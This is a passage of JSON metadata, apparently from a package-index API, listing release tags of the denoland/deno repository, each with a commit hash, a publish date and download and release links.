45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_